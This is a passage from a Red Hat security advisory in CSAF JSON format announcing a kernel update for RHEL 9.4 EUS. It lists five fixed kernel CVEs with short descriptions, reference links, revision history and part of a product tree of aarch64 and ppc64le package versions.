| https://access.redhat.com/security/cve/CVE-2024-47727 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2320259 | external |
| https://www.cve.org/CVERecord?id=CVE-2024-47727 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2024-47727 | external |
| https://lore.kernel.org/linux-cve-announce/202410… | external |
| https://access.redhat.com/security/cve/CVE-2025-38024 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2373354 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-38024 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-38024 | external |
| https://lore.kernel.org/linux-cve-announce/202506… | external |
| https://access.redhat.com/security/cve/CVE-2025-38129 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376034 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-38129 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-38129 | external |
| https://lore.kernel.org/linux-cve-announce/202507… | external |
| https://access.redhat.com/security/cve/CVE-2025-38206 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376377 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-38206 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-38206 | external |
| https://lore.kernel.org/linux-cve-announce/202507… | external |
| https://access.redhat.com/security/cve/CVE-2025-71085 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2429026 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-71085 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-71085 | external |
| https://lore.kernel.org/linux-cve-announce/202601… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel is now available for Red Hat Enterprise Linux 9.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: x86/tdx: Fix \"in-kernel MMIO\" check (CVE-2024-47727)\n\n* kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution (CVE-2025-38024)\n\n* kernel: page_pool: Fix use-after-free in page_pool_recycle_in_ring (CVE-2025-38129)\n\n* kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service (CVE-2025-38206)\n\n* kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:4246",
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2320259",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2320259"
},
{
"category": "external",
"summary": "2373354",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373354"
},
{
"category": "external",
"summary": "2376034",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376034"
},
{
"category": "external",
"summary": "2376377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376377"
},
{
"category": "external",
"summary": "2429026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429026"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_4246.json"
}
],
"title": "Red Hat Security Advisory: kernel security update",
"tracking": {
"current_release_date": "2026-05-20T09:00:08+00:00",
"generator": {
"date": "2026-05-20T09:00:08+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:4246",
"initial_release_date": "2026-03-11T01:14:40+00:00",
"revision_history": [
{
"date": "2026-03-11T01:14:40+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-11T01:14:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-20T09:00:08+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product": {
"name": "Red Hat Enterprise Linux AppStream EUS (v.9.4)",
"product_id": "AppStream-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.4::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product": {
"name": "Red Hat Enterprise Linux BaseOS EUS (v.9.4)",
"product_id": "BaseOS-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:rhel_eus:9.4::baseos"
}
}
},
{
"category": "product_name",
"name": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product": {
"name": "Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.4::crb"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product": {
"name": "Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.4::realtime"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.4::nfv"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel-matched@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel-matched@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"product": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"product_id": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool-debuginfo@7.3.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-aarch64@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"product": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"product_id": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bpftool@7.3.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-extra@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-extra@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"product": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"product_id": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-427.114.1.el9_4?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"product": {
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_id": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-427.114.1.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"product": {
